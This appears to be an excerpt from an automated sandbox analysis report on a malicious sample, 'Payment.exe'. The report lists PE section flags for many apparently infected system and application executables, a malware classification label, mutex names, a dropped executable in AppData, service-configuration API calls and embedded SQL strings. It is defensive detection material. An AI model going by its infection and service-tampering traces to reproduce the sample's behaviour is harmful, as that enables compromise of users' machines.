Source: TieringEngineService.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: pingsender.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe0.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SgrmBroker.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: Payment.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jwBqGZseW.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: WBEngine.0.etl.34.dr	Binary string: \\?\GLOBALROOT\Device\HarddiskVolume1\(
Source: AdobeCollabSync.exe.8.dr	Binary string: @com.adobe.accp.review.v1\??\UNC\\\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\bisLoggingEnabled

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@38/170@98/24

Source: C:\Users\user\Desktop\Payment.exe

Code function: 8_2_02E6CBD0 StrStrIW,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,StartServiceW,

8_2_02E6CBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Users\user\Desktop\Payment.exe

File created: C:\Users\user\AppData\Roaming\jwBqGZseW.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
Source: C:\Users\user\Desktop\Payment.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-89ead7124fd5c239-inf
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3452:120:WilError_03
Source: C:\Windows\System32\AppVClient.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-89ead7124fd5c2399ea72c54-b
Source: C:\Users\user\Desktop\Payment.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-89ead7124fd5c2393d78ffaf-b
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Mutant created: \Sessions\1\BaseNamedObjects\WkfCIPWpgYCIXtifG
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03

Source: C:\Users\user\Desktop\Payment.exe

File created: C:\Users\user\AppData\Local\Temp\tmp18CE.tmp

Jump to behavior

Source: Payment.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Payment.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Payment.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payment.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT content_item_relations.src_content_item_id, branches.download_state, content_items.creation_id,branches.content_item_id,branches.record_created, branches.modified, content_items.asset_id, content_items.type, content_items.content_item_type, content_items.removed_from_server, content_items.pending_local_delete, content_item_revisions.cloud_etag, content_item_revisions.updated, content_item_revisions.local_etag, content_item_revisions.request_id, content_item_revisions.content_name, content_item_resources.resource_cloud_etag , content_item_resources.resource_local_etag , resource_revisions.rel_to_content_item , resource_revisions.resource_type, resource_revisions.committed, resource_content.resource_content, (select 1 from branches where branch_name = 'conflict' AND content_item_id = :id) as is_conflicted,(SELECT 1 FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id) WHERE( branches.app_id = :appId AND branches.branch_name = 'current' AND branches.content_item_id = :id AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = 'base' AND branches.content_item_id = :id))))) as is_sync_pending, (SELECT resource_content.resource_content FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_resources ON (branches.content_item_revision_id = content_item_resources.content_item_revision_id) JOIN resource_revisions ON (content_item_resources.resource_revision_id = resource_revisions.revision_id) JOIN resource_content ON (resource_revisions.hash = resource_content.resource_content_id) WHERE( branches.content_item_id = :id AND branches.branch_name = 'error' AND branches.app_id = :appId)) as error_payload FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) JOIN content_item_resources ON (branches.content_item_revision
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: UPDATE branches SET content_item_revision_id = :contentItemRevisionId, modified = :modified, download_state = :downloadState WHERE( content_item_id = :contentItemId AND branch_name = :branchName AND app_id = :appId);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS resource_content ( resource_content_id TEXT PRIMARY KEY NOT NULL, resource_content TEXT NOT NULL);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: INSERT INTO content_items( creation_id, asset_id, type, content_item_type, created, removed_from_server, pending_local_delete) VALUES( :creationId, :assetId, :type, :contentItemType, :created, :removedFromServer, :pendingLocalDelete);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests WHERE( request_type = :requestType);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: INSERT OR REPLACE INTO branches( content_item_id, content_item_revision_id, branch_name, app_id, is_transient, record_created, modified, download_state) VALUES( :contentItemId, :contentItemRevisionId, :branchName, :appId, :isTransient, :recordCreated, :modified, :downloadState);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: UPDATE content_items SET pending_local_delete = :pendingLocalDelete WHERE( creation_id = :creationId);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: INSERT OR REPLACE INTO content_item_relations( src_content_item_id, target_content_item_id, rel) VALUES( :srcContentItemId, :targetContentItemId, :rel);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: INSERT INTO resource_revisions( revision_id, rel_to_content_item, resource_type, media_type, locator, committed, hashType, hash, storageSize, width, height) VALUES( :revisionId, :relToContentItem, :resourceType, :mediaType, :locator_var, :committed_var, :hashType_var, :hash_var, :storageSize_var, :width_var, :height_var);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS branches ( content_item_id TEXT NOT NULL, content_item_revision_id TEXT NOT NULL, branch_name TEXT NOT NULL, app_id TEXT NOT NULL, is_transient INTEGER DEFAULT 0 NOT NULL, record_created TIMESTAMP NOT NULL, modified TIMESTAMP NOT NULL, download_state TEXT DEFAULT NULL, PRIMARY KEY (content_item_id, branch_name, app_id));
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS content_item_resources ( content_item_revision_id TEXT NOT NULL, resource_revision_id TEXT NOT NULL, resource_id TEXT DEFAULT NULL, resource_cloud_etag TEXT DEFAULT NULL, resource_cloud_version_id TEXT DEFAULT NULL, resource_local_etag TEXT DEFAULT NULL, resource_local_version_id TEXT DEFAULT NULL, PRIMARY KEY (content_item_revision_id, resource_revision_id));
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: INSERT INTO device_mappings( device_mapping_id, content_item_id, collection_id, content_item_type, include_rel_types, include_depth, branch, TTL, Priority, app_info) VALUES( :deviceMappingId, :contentItemId, :collectionId, :contentItemType, :includeRelTypes, :includeDepth, :branch, :TTL, :priority, :appInfo);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: INSERT INTO content_item_resources( content_item_revision_id, resource_revision_id) VALUES( :contentItemRevisionId, :resourceRevisionId);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: INSERT INTO branches ( content_item_id, content_item_revision_id, branch_name, app_id, is_transient, record_created, modified, download_state) VALUES( :contentItemId, :contentItemRevisionId, :branchName, :appId, :isTransient, :recordCreated, :modified, :downloadState);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: UPDATE content_items SET removed_from_server = :removedFromServer WHERE( creation_id = :creationId);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: UPDATE branches SET modified = :modified WHERE( content_item_id = :contentItemId AND branch_name = :branchName AND app_id = :appId);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT branches.content_item_id FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id) WHERE( branches.app_id = :appId AND branches.branch_name = :branch1 AND branches.content_item_id = :contentItemId AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = :branch2 AND branches.content_item_id = :contentItemId))));
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS resource_revisions ( revision_id TEXT PRIMARY KEY NOT NULL, rel_to_content_item TEXT NOT NULL, resource_type TEXT NOT NULL, media_type TEXT NOT NULL, locator TEXT NOT NULL, committed INTEGER NOT NULL, hashType TEXT DEFAULT NULL, hash TEXT DEFAULT NULL, storageSize INTEGER DEFAULT 0, width INTEGER DEFAULT 0, height INTEGER DEFAULT 0);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: select count(*) from SQLITE_MASTER where type = "table";
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: UPDATE content_items SET pending_local_delete = :pendingLocalDelete WHERE( creation_id = :creationId);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: INSERT INTO content_item_revisions( content_item_revision_id, cloud_etag, updated, local_etag, request_id, content_name) VALUES( :contentIemRevisionId, :cloudEtag, :updated, :localEtag, :requestId, :contentName);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS content_item_revisions( content_item_revision_id TEXT PRIMARY KEY NOT NULL, cloud_etag TEXT DEFAULT NULL, cloud_version_id TEXT DEFAULT NULL, updated TIMESTAMP DEFAULT NULL, acl TEXT DEFAULT NULL, local_etag TEXT DEFAULT NULL, local_version_id TEXT DEFAULT NULL, request_id TEXT DEFAULT NULL, content_name TEXT DEFAULT NULL);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS content_items( creation_id TEXT PRIMARY KEY NOT NULL, asset_id TEXT DEFAULT NULL, type TEXT NOT NULL, content_item_type TEXT NOT NULL, created TEXT NOT NULL, removed_from_server INTEGER DEFAULT 0 NOT NULL, pending_local_delete INTEGER DEFAULT 0 NOT NULL, update_seq_num INTEGER DEFAULT 0 NOT NULL);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS sync_tokens ( content_item_id TEXT PRIMARY KEY NOT NULL, token TEXT DEFAULT NULL, last_sync_time TIMESTAMP DEFAULT NULL, device_mapping_id TEXT DEFAULT NULL);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: UPDATE pending_requests SET request_status = :requestStatus, message = :message, status_code = :statusCode WHERE( pending_request_id = :pendingRequestId);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT * FROM device_mappings WHERE( content_item_id = :contentItemId);
